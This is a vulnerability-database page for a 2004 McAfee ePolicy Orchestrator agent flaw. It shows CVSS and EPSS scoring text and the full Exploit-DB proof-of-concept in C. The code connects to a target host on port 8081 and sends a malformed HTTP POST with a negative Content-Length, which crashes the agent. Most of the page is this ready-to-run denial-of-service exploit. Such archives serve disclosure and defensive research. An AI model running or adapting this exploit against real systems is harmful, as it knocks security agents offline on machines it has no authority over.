Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 23584
Publication date : 2004-01-21 23h00 +00:00
Author : cyber_flash
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/9476/info
The McAfee ePolicy Orchestrator agent has been reported to a buffer management vulnerability that may be exploited to crash the affected agent. Although unconfirmed, it has been reported that the issue may also allow a remote attacker to trigger a buffer overflow vulnerability.
The issue reportedly presents itself, because certain values in HTTP POST headers processed by the ePolicy Orchestrator are not sufficiently sanitized.
/*
>McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement
Vulnerability PoC
>Ref : http://securityfocus.com/bid/9476
>discovered by :
[email protected]
"
The McAfee ePolicy Orchestrator agent has been reported to a buffer
management vulnerability that may be exploited to crash the affected
agent. Although unconfirmed, it has
been reported that the issue may also allow a remote attacker to trigger
a buffer overflow vulnerability.
The issue reportedly presents itself, because certain values in HTTP POST
headers processed by the ePolicy Orchestrator are not sufficiently
sanitized.
"
>Hi NA-eye ;-) . Hurry-yup . relase a patch guyz !
+ PoC by Shashank Pandey a.k.a
G0D_0F_z10N +
> Greetz to my dewd 'Arun Jose' for 'Grass is not addictive..thing' while
i wuz writing this..!
> lame coding ..dont think too much abt it...
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
int main(int argc, char *argv[])
{
WSADATA wsaData;
int s;
struct hostent *yo;
struct sockaddr_in wutever;
char badb0y[] =
"POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0
HTTP/1.0\r\n"
"Accept: application/octet-stream\r\n"
"Accept-Language: en-us\r\n"
"Content-Type: application/octet-stream\r\n"
"User-Agent: Godzilla/6.9 (compatible; SPIPE/3.0;
Windows)\r\n"
"Host: EPO_DIE\r\n"
"Content-Length: -1\r\n"
"Connection: Keep-Alive\r\n\r\n";
printf("\n--------------------------------- ");
printf("\n McAfee ePO agent overflow PoC \n");
printf("+++++++++++++++++++++++++++++++++\n");
printf(" by Shashank Pandey \n");
printf(" (
[email protected]) \n");
printf("--------------------------------- \n");
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("Error :Cudn't initiate winsock!");
return 0;
}
if(argc<2)
{printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
exit(0);}
if ( (yo = gethostbyname(argv[1]))==0)
{
printf("error: can't resolve '%s'",argv[1]);
return 1;
}
wutever.sin_port = htons(8081); // ePO agent uses the HTTP protocol to
communicate on port 8081
wutever.sin_family = AF_INET;
wutever.sin_addr = *((struct in_addr *)yo->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}
if ((connect(s, (struct sockaddr *) &wutever, sizeof(wutever))) == -1){
printf("Error:Cudn't Connect\r\n");
return 1;
}
printf("\r\nCrashing the client...< it's a PoC dewd ;-) >\n");
send(s,badb0y,strlen(badb0y),0);
closesocket(s);
WSACleanup();
return 1;
}
Products Mentioned
Configuraton 0
Mcafee>>Epolicy_orchestrator >> Version 3.6.0
References